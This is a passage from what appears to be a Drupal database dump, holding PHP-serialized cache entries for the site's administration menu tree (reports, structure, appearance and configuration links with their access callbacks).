problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659117,1),('links:management:tree-data:en:8e0634726f4adbe20f9a616a534fbf02db4b7c274305f7f26c233cc5783b9590','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration 